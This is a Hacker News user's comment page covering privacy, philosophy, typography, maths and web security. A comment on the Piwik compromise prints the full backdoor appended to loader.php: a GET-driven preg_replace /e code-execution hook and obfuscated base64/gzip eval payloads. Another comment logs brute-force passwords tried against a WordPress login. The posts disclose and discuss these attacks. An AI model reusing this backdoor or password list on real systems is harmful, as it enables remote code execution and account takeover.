HNHacker News
TopNewBestAskShowJobs

infinity

2,393 karma · joined January 2, 2009

hi :)
submissionscomments
infinity··on PRISM fears give private search engine DuckDuckGo its best week ever

    >>Valuable for blackmail, but not really useful
    >>for anything else; the commercial value of 
    >>information rapidly degrades over time.
    >>Knowing I want to buy a new fridge today is very
    >>valuable, knowing I wanted to buy one last month is      >>nearly worthless.
I think that blackmail is already bad enough. Considering which topics somebody might want to learn about on the internet, various diseases for example.

    >>I hope that ISPs do not release personal
    >>identity or billing data to arbitrary third parties.
I hope that too. But this information is gathered and stored somewhere in flawed systems which are operated by humans which might decide to follow their own interests more than the interests of the customers. I know of at least one story where an employee of a search engine has been using his privileges to stalk other people.
infinity··on PRISM fears give private search engine DuckDuckGo its best week ever
The IP address from which you send your request to a search engines website may be regarded as a personally identifying information. In case that this information becomes publicly available the connection between your search terms and your IP address will be visible. In fact, this has happend in the past and there was a searchable database with the leaked information online where you could look up search terms.

I don't know what data Google and Bing are collecting, but here is one quote from the wikipedia entry on internet privacy concerning the AOL search engine:

A search engine takes all of its users and assigns each one a specific ID number. Those in control of the database often keep records of where on the Internet each member has traveled to. AOL’s system is one example. AOL has a database 21 million members deep, each with their own specific ID number. The way that AOLSearch is set up, however, allows for AOL to keep records of all the websites visited by any given member. Even though the true identity of the user isn’t known, a full profile of a member can be made just by using the information stored by AOLSearch. By keeping records of what people query through AOLSearch, the company is able to learn a great deal about them without knowing their names.

Source: http://en.wikipedia.org/wiki/Internet_privacy

infinity··on Dropping In on Gottfried Leibniz
No, these are different things. The monads or 'simple substances' in the monadology of Leibniz are an important part of his later philosophy and a tool to solve metaphysical problems. For example, God is a monad, all other monads are created from it, they cannot come into existence by themselves.

In computer science monads are an abstract data type.

infinity··on Dropping In on Gottfried Leibniz
Considering that Leibniz was truly a gifted child of the Age of Enlightenment and a philosopher, scientist, mathematician, diplomat, physicist, historian, politician, librarian and lawyer, who has left behind an opus of written documents that requires one whole dedicated Leibniz archive, I was indeed astonished by the tone of the author - comparing himself with Leibniz :)
infinity··on Huge attack on WordPress sites could spawn never-before-seen super botnet
Yes, of course you're right, my mistake. Mainly I wanted to share some information and give examples of passwords.

Here are some more observations which I made during the last months:

Most of the time it seems that the attackers are using a list of popular passwords, the same passwords appear over and over again: 12345, qwerty, 1q2w3e4r, and so on.

Most of the time they try to login as "admin", "Admin", "administrator", "root" or the name of the domain or blog or a part of that name, for example omitting a ".com".

In the HTTP requests, the parameters "log" (for the user name) and "pwd" (for the password) are always transmitted, but the parameters "wp-submit=Log In" and "testcookie=1" are not always transmitted.

Many of these attacks do not transmit a user-agent field in the HTTP headers. Blocking the empty user-agent seems like a good idea to me.

These attacks look simple, but I guess that they are successful on a big number of sites.

infinity··on Huge attack on WordPress sites could spawn never-before-seen super botnet
I write all (futile) login attempts on my site to a log file. I can confirm this rise in password bruteforcing attempts during the last days.

This is what the bruteforce passwords look like, these tried to login as "admin":

  [Sat Apr 13 05:30:31 2013]   nevalidniipass 
  [Sat Apr 13 05:30:34 2013]   gfhjkm 
  [Sat Apr 13 05:30:37 2013]   gggggggg 
  [Sat Apr 13 05:30:39 2013]   ghbdtn 
  [Sat Apr 13 05:30:41 2013]   ghgftmn6 
  [Sat Apr 13 05:30:43 2013]   ghghgh 
  [Sat Apr 13 05:30:44 2013]   ghjkju 
  [Sat Apr 13 05:30:46 2013]   ghjrdjcn 
  [Sat Apr 13 05:30:48 2013]   gjkzyjxr 
  [Sat Apr 13 05:30:50 2013]   globax123 
  [Sat Apr 13 05:30:52 2013]   go0gle 
  [Sat Apr 13 05:30:54 2013]   go2fuck 
  [Sat Apr 13 05:30:55 2013]   gogogo 
  [Sat Apr 13 05:30:57 2013]   goldz 
  [Sat Apr 13 05:30:59 2013]   gthtw112 
  [Sat Apr 13 05:31:02 2013]   guest 
  [Sat Apr 13 05:31:05 2013]   h69s9t 
  [Sat Apr 13 05:31:07 2013]   hackett 
  [Sat Apr 13 05:31:08 2013]   hal9000 
  [Sat Apr 13 05:31:10 2013]   hazem200 
  [Sat Apr 13 05:31:12 2013]   heccrbqh 
  [Sat Apr 13 05:31:14 2013]   herbie 
  [Sat Apr 13 05:31:16 2013]   hghgh 
  [Sat Apr 13 05:31:18 2013]   hhhh1 
  [Sat Apr 13 05:31:20 2013]   hhhhhaaaaa 
  [Sat Apr 13 05:31:21 2013]   hockey 
  [Sat Apr 13 05:31:23 2013]   home555 
  [Sat Apr 13 05:31:25 2013]   honda 
  [Sat Apr 13 05:31:27 2013]   htrdbtv 
  [Sat Apr 13 05:31:29 2013]   http 
  [Sat Apr 13 05:31:31 2013]   hycvibck 
  [Sat Apr 13 05:31:33 2013]   i_am 
  [Sat Apr 13 05:31:35 2013]   ib6ub9 
  [Sat Apr 13 05:31:37 2013]   icing 
  [Sat Apr 13 05:31:38 2013]   icq123 
  [Sat Apr 13 05:31:40 2013]   icqpass 
  [Sat Apr 13 05:31:42 2013]   if6was9 
  [Sat Apr 13 05:31:44 2013]   ifhgtq79 
  [Sat Apr 13 05:31:46 2013]   ifyfif 
  [Sat Apr 13 05:31:48 2013]   iiiiiiii 
  [Sat Apr 13 05:31:50 2013]   ikaihsot 
  [Sat Apr 13 05:31:52 2013]   il0vey0u 
  [Sat Apr 13 05:31:54 2013]   iloveaol 
  [Sat Apr 13 05:31:56 2013]   iloveu 
  [Sat Apr 13 05:31:57 2013]   iloveyou 
  [Sat Apr 13 05:31:59 2013]   inferno 
  [Sat Apr 13 05:32:01 2013]   infinity 
  [Sat Apr 13 05:32:05 2013]   infree 
  [Sat Apr 13 05:32:08 2013]   iof314 
  [Sat Apr 13 05:32:11 2013]   jake4440 
  [Sat Apr 13 05:32:13 2013]   jamie1 
  [Sat Apr 13 05:32:15 2013]   janice 
  [Sat Apr 13 05:32:16 2013]   jay18birdman 
  [Sat Apr 13 05:32:18 2013]   jc5000 
  [Sat Apr 13 05:32:20 2013]   jeffery 
  [Sat Apr 13 05:32:22 2013]   john1 
  [Sat Apr 13 05:32:24 2013]   joomla 
  [Sat Apr 13 05:32:26 2013]   joshua 
  [Sat Apr 13 05:32:27 2013]   keys 
  [Sat Apr 13 05:32:29 2013]   kholmsk3 
  [Sat Apr 13 05:32:31 2013]   kir11421 
  [Sat Apr 13 05:32:33 2013]   kkkkkk 
  [Sat Apr 13 05:32:35 2013]   kngvhpg 
  [Sat Apr 13 05:32:37 2013]   ko#]|7sz 
  [Sat Apr 13 05:32:39 2013]   kxvq4k2d 
  [Sat Apr 13 05:32:41 2013]   laksmi 
  [Sat Apr 13 05:32:42 2013]   lefty 
  [Sat Apr 13 05:32:44 2013]   lex1977 
  [Sat Apr 13 05:32:46 2013]   linux 
  [Sat Apr 13 05:32:48 2013]   lol 
  [Sat Apr 13 05:32:50 2013]   lol777 
  [Sat Apr 13 05:32:52 2013]   lollol 
  [Sat Apr 13 05:32:54 2013]   lovelove 
  [Sat Apr 13 05:32:55 2013]   lucille2000 
  [Sat Apr 13 05:32:57 2013]   lyxasgje 
  [Sat Apr 13 05:32:59 2013]   m@$ter 
  [Sat Apr 13 05:33:02 2013]   m@ster 
  [Sat Apr 13 05:33:07 2013]   m1911a1 
  [Sat Apr 13 05:33:11 2013]   google 
  [Sat Apr 13 05:33:13 2013]   facebook 
  [Sat Apr 13 05:33:15 2013]   microsoft 
  [Sat Apr 13 05:33:17 2013]   obama 
  [Sat Apr 13 05:33:18 2013]   twitter 
  [Sat Apr 13 05:33:20 2013]   wp 
  [Sat Apr 13 05:33:22 2013]   wordpress 
  [Sat Apr 13 05:33:24 2013]   060890 
  [Sat Apr 13 05:33:26 2013]   060891 
  [Sat Apr 13 05:33:28 2013]   060893 
  [Sat Apr 13 05:33:30 2013]   060988 
  [Sat Apr 13 05:33:32 2013]   060989
They also try to get access as "administrator".
infinity··on Balancing text for better readability
I have been told that it looks "expensive".
infinity··on Balancing text for better readability
The "4.5:1 requirement" can be found in the Web Content Accessibility Guidelines (WCAG) 2.0, part of a series of Web accessibility guidelines published by the W3C's Web Accessibility Initiative:

http://www.w3.org/TR/WCAG/

Here is a detailed explanation:

http://www.w3.org/TR/UNDERSTANDING-WCAG20/visual-audio-contr...

infinity··on Why don't websites immediately display their text these days?
>fonts can help readability

Yes, this is true. But it seems that many custom fonts are not designed for being rendered in a browser.

Recently, I have seen pages using fonts which look blurred, fuzzy or have a weird shape. These fonts are used for the main content (copy text). There must be people who notice that this is hard to read, but nobody seems to say anything. Some days ago I was told that "it looks expensive".

I am also affected by occasional browser and OS freezing due to webfonts. The freezing may last for an eternity (subjective) and is accompanied by an intense feeling that I have lost control. A user experience can't be worse.

infinity··on Turn your browser into a notepad with one line
Yes :)

I have added some color:

data:text/html, <html contenteditable><body style='background-color:rgb(0,81,129); color:rgb(93,180,227);font-family:monospace;font-weight:bold'>ATARI COMPUTER - MEMO PAD</body></html>

infinity··on Turn your browser into a notepad with one line
Maybe this helps you, there is a W3 document about touch events: http://www.w3.org/TR/touch-events/

A list of TouchEvent types is here: http://www.w3.org/TR/touch-events/#list-of-touchevent-types

Here is a document from Apple about touch events:

http://developer.apple.com/library/safari/#documentation/app...

And a list of events supported by the Safari browser: http://developer.apple.com/library/safari/#documentation/app...

I don't have an iPad, but I would love to know, if you could successfully use one of these events in this context.

Edit: For example, orientationchange looks promising. Type something, then change orientation.

infinity··on Alert: Backdoor placed in Piwik
I'm sorry, I don't have this file, but I would like to look at it as well. If you find it somewhere on the web, could you post a link here?
infinity··on Is zero an even number?
That depends on which concept of "number" and which foundation you would accept as a basis for doing arithmetic.

I would expect any useful system of arithmetic, offering addition and subtraction, to contain some concept of "nothing". Because if a is something that might be subtracted from anything else including itself, we have the result that a - a is something we should be able to talk about, namely nothing.

If you accept a sufficiently strong set theory as a foundation of mathematics, for example the Zermelo Fraenkel set theory including the axiom of choice (ZFC), it is possible to use the finite ordinal numbers - which are actually sets - as the natural numbers.

From the ZFC axioms we have the existence of the empty set, often denoted by a pair of empty brackets {}.

We can then define numbers by using the empty set:

0 := {}

1 := {0} = {{}}

2 := {0,1} = {{},{{}}}

... and so on. By this definition zero is a number.

On the other hand, by defining numbers on the basis of set theory we seem to accept that numbers are sets. Some people will have very different opinions about this matter.

infinity··on Alert: Backdoor placed in Piwik
The article says that the malicious code has been appended to the loader.php file. The malicious code cited in the article is abridged, here is a complete version:

  <?php Error_Reporting(0);     if(isset($_GET['g']) && isset($_GET['s'])) { 
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit; 
  } 
  if (file_exists(dirname(__FILE__)."/lic.log")) exit; 
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWEpFGwk4nZr4zkRGQsJn3kMND6jcBgayIKnkIX3n2tu1EieGARMoH3W8NXjBp4JAVQq8GFR/KcAbcyoSfhX9vzeU0R8K3mH313Q4UnAykzj9707HzHZ67PJndpyPSqKHbZ0kLq6N0s5KdDxSKYz7wkwE80mW6e3m3gbz8l0i2jh50b2sRJEnwjxJ1tOjVvumO9RrPHsT9BZNSN0qm2F2TlLDO9EqSNMADWCHW/LmLsvmbn009XNOA38yH6qNUm+a97jyA55xzFpgViGxa2SlN2ObBZQeuxwwL9kocnrzBWVXDMo='))); ?><? eval(gzuncompress(base64_decode('eF5dj1tvgkAQhf+KDyRq0gdYUCGGB7RCaYGmwC6BpjHLpStXjbgoNv3vBUybxofJzJmc+U7mk1bRKd1Xoy0niAuBBzPATZh0+sVgWTkecTsZu540x96l9h2RMzKFvKjxISztJubNha7Crv40cYs3YjnC5bVdFWHKIXitSVT5c9MRBCPbUCvNiQ1QhoHYmJlytq4Kb2aQ2GXRBl7QJGux7TKouRbA+GHsqDaEqqS7nAU7CXNkI4hcpEoI5rncrZ6JPDRX7/34yWajx31j8Ks25C02BAWIAKQ+kE4GT2ik7c6dzQCXg9/O6hBE/XFUojLIWPkXoAzI0EMs1qS8z91ILrptOxKNNUTjm/znxxraBRpqB6B+x71L9J16MGgFj71hXPd/TJfH5ESP1SjEdTIXtnES7eNkwuB3Jv2YLr9/AJyvggM='))); ?><? eval(gzuncompress(base64_decode('eF59VH9r2zAQ/SouBGoxE3SSf2I0lnVOCXhxsZ3tj2BE2JIRKMnwEtgo/e47ycliuZMDcpDu3rvT6d5lbXtsZbn9eWxP+8MPtz2eD99dSkg6kVRcdu8CtQUhwY8jn7OAAbrgERMTWWXll6xc921AGmf6XwsjTQd7zIuPs7xa30sOCUsSRkN536xp4/bdOfH6W594CFaBuZELprffuTZOaKwmhuHkfJFnUhJn2qcMCSHb3/tTujsfvp32x4PzLCV1J9LHFABXgCskLxMZWS/DGxdztRh9zEpG3sOqzIunWuIfEvp2/2Dgj8WdPWbLWqVjR4Umql58zoqVwgR2TGRi5kWeF1/z4mFWL4qld20JOmXB4EPsnLHJWWb1qlzW5WxZzbOyzzlcI5yJyflUVHWPifd+49uREEDfxpgvsvxTZfRlRFS7h6oxY2s3AGiukWDs4tBuT+f24CBZ+tpvP0Bzot6bqg8IPGKqA4GJTdtu/hjSiYl477w9TtSxoVVqagxAeaggpFMVRnLuhHBu0Uyto6TNA04aoVDpK365vR5cXRe0nMEXH6x+WimJmSROgt3m+ddWFYLrPO8UC3m51E4bMQEbp1YT+N5twOk0gpE0wg5yLUrgCCyKjjOM+u/9INA1CMXl8bh5iUC3Dbsyhs6N8IqiGtVNHNoNP8VonzmA6rVPwtg67wAHnpldNKYLrT2ITEQ85ExGKBjtKEj6F8qIppY='))); ?>
infinity··on Alert: Backdoor placed in Piwik
The problem with disable_functions is that eval is not an internal function, but a language construct. From the manual:

Only internal functions can be disabled using this directive.

It is possible to generate something like a list of all available internal functions, eval is missing here:

  $arr = get_defined_functions();
  var_dump($arr['internal']);
The Suhosin extension will let you block eval, if it is available:

http://www.hardened-php.net/suhosin/configuration.html#suhos...

infinity··on GET /browser.exe
The next step in the sequence is to get rid of interactivity. We have then reached television.
infinity··on How to beat comment spam
A real spammer will take any link, it doesn't matter if the link won't be considered as some form of endorsement by search engines due to the use of the rel=nofollow attribute. A spammer will happily post a million links, there will be some poor souls out there and click on some of them. Quantity over quality has always been one characteristic trait of spam.

Spam and link spam were already there before Google existed and the PageRank was invented. The index of the AltaVista search engine was huge and full of spam.

When the nofollow value for the rel attribute was introduced there were many claims that this would reduce the amount of link and comment spam. Critical remarks came often from people who were offering link building and SEO as a service.

infinity··on 0.3 - 0.2 == 0.2 - 0.1 is falsy. Which language gets this right?
I have just tested it on a Windows Vista machine, it doesn't work in Internet Explorer, Opera and Safari. Putting each side of the equation into an alert box shows the difference.
infinity··on Ask HN: Why am I getting ads on HN?
To me it looks like you have some kind of spyware on your computer. Check your local hosts file for unwanted entries:

http://en.wikipedia.org/wiki/Hosts_(file)

Also have a look at the source code of the HN page if there is anything which might explain this behaviour. Maybe it is running inside a frame site which opens the ads? There are so many possibilities ...

If there really is some malware on your system I recommend the procedure known as Nuke it from Orbit: Wipe everything clean, install a clean operating system, restore important things from a backup. And change all your passwords from a clean system.

infinity··on Nokia faked the still photos too
On the other hand, it is very easy to edit and fake EXIF and metadata. Adding EXIF data fields to demo pictures does not increase the credibility.
infinity··on SEO spam on Hacker News?
Yes, often this is spam. But I wouldn't call it SEO, because the practice of dropping spam links on Hacker News has as much in common with optimizing websites for search engines as research in physics has in common with trying to invent the perpetuum mobile.
infinity··on Write any javascript code with just these characters: ()[]{}+
Some of you may also enjoy aaencode by Yosuke Hasegawa:

http://utf-8.jp/public/aaencode.html

Encode any JavaScript program to Japanese style emoticons (^_^)

And of course jjencode:

http://utf-8.jp/public/jjencode.html

(hint: have a look at "palindrome")

infinity··on Internet Explorer 6 Countdown
This inaccuracy is a common problem with graphs and charts. The proprotions do not match in this case. Maybe the ring has been designed by a designer, constructed with old data, and now it is easy to change the numbers in the graphic, but difficult to adjust the size of the ring segments? Or maybe somebody has just forgotten to update the ring segments when the last update of the numbers was made.

Sometimes fancy, but graphically inccurate, charts are used to cheat and deceive, by representing small things larger or big things smaller. Putting a pie chart in 3D can have the effect of altering the perceived information, because if you're looking at the pie chart from above but slighly sideways, the part of the chart closer to you may appear larger, and since you can rotate the chart before rendering the final picture the choice of that part is yours.

infinity··on Stop worrying about Time To First Byte (TTFB)
>>increasingly complex front-end Javascript blocking the browser's UI thread

I agree with you, before optimizing the performance somewhere near the HTTP layer there is often much that can be done at the front-end or the back-end level. The loading of web fonts can actually block a browser for some time until the font is loaded (and often makes the page much harder to read ) - it is not just that the user has to wait for the loading to finish, but the browser sometimes freezes completely (for example, this happens sometimes with Opera), which is a bad user experience.

"Perceptible latency" requires that we have some people who will load the page and measure if is was fast or slow or sluggish. In my experience this is often said to be too expensive or too much work. Actually, it requires just a few people with different browsers and internet connections to get a good idea if the website is fast or slow - BUT: this is nothing that is measured precisely.

The TTFB given by the tests, mentioned in the article, on the other hand, looks like really hard data, measured exactly in fractions of seconds. This can be plotted nicely in a graph, for example.

Another way to see if a website is fast or slow is to ask the visitors. There has been a survey on one large website, which I have created, with some open questions about the new website. One open question was: What do you like about the website. More than 90 percent of the visitors, who have filled out the survey, answered that they have noticed how fast the website loads.

infinity··on Stop worrying about Time To First Byte (TTFB)
In the article it was examined what some of the tests for page load speed measure as TTFB: The tests measure the time until the arrival of the first character of the HTTP headers.

When using a dynamically generated page it is possible to send the HTTP headers, then maybe send some some content and then do some server side calculations or database access, and finally send the rest of the page content. The TTFB measured by the tests, which were mentioned in the article, will not reflect the time needed for server side calculations.

When using a server side scripting language there may be some kind of output buffering, which has to be deactivated first.

infinity··on Pwning a Spammer's Keylogger
It looks like the author of the article was using Wireshark to intercept network traffic. In the article there is a screenshot of a window with the title "follow TCP stream" and a headline "Stream content", exactly like in Wireshark.

I have used the same trick sometimes when nobody could remember the FTP credentials, but they were stored in the FTP program and a connection to the FTP server was still possible. Sometimes the guy with access to the admin panel is just not available, so a possible solution is to use Wireshark to retrieve the password, which is usually transmitted without encryption.

infinity··on Megaupload down, FBI Charges Seven With Online Piracy
Yes, Kim "Kimble" Schmitz is a name I remember from 90's. He was quite often on TV in Germany, showing off his luxurious life-style, girls and cocktails at a pool, that sort of thing. And then he was jailed. He is indeed a convicted criminal.

The german Wikipedia has a nice overview over his former activities: http://de.wikipedia.org/wiki/Kim_Schmitz

This guy has never been a modern Robin Hood.

infinity··on Googlebot Running Javascript
One important information is missing here: the IP address of the crawler, the official Googlebot can then be identified. There are so many bots out there disguised as Googlebots, most of them do weird things: scanning for log-in pages, sending POST requests with spam, searching for vulnerable sites.

The Googlebot has been seen using POST requests and executing JavaScript for some time now. There is even an official article on this topic on the Google Webmaster Central blog:

http://googlewebmastercentral.blogspot.com/2011/11/get-post-... (from Nov. 2011)

infinity··on So You Want to Save the World
Developing a way to cure aging and saving the world are generally very different things, depending on how you define saving the world. Because the concept of saving involves an idea of saving from something. If we have a concept of the world, what should it be saved from? And are we an essential part of the world? Does the world end if we all die?
infinity··on The Day I Saw Van Gogh’s Genius in a New Light
I don't think that most of the paintings look better or more interesting in the protanomal simulation, some of them actually have lost their magic and look dull. I find this most visible in the self-portrait, of which the author writes: the man whom one cannot approach easily.

The tinge of green in the original portrait makes this man much harder to approach, because it adds the psychotic, unusual aura to the picture. This man has left the world of commonly shared human experience.

The author remarks that in the picture The Road Menders the trees have a strange color and after conversion look more solid, giving some depth to the road. So the picture looks more like what we would expect, in other words: we see the usual.

But this is contrary to the kind of psychotic perception of the world, which I associate with van Gogh's paintings, at least with those paintings that we would call typical van Gogh (there are paintings from the earlier dutch period, which have a different character): Reality is distorted, colors deviate from the ordinary, everything is flowing together and swirling, the wheat, the sky, the world. Proportions are deranged, look at the painting of his bedroom for example:

http://de.wikipedia.org/w/index.php?title=Datei:Vincent_Will...

Theo van Gogh, his brother, wrote 1889 in a letter to his future wife a characterization of Vincent van Gogh: "As you know, he has broken since a long time with everything what we call convention. The style of his clothes and his behaviour show that this is a special human, and since many years people who see him will say: This is a madman."

← PreviousPage 2 of 6Next →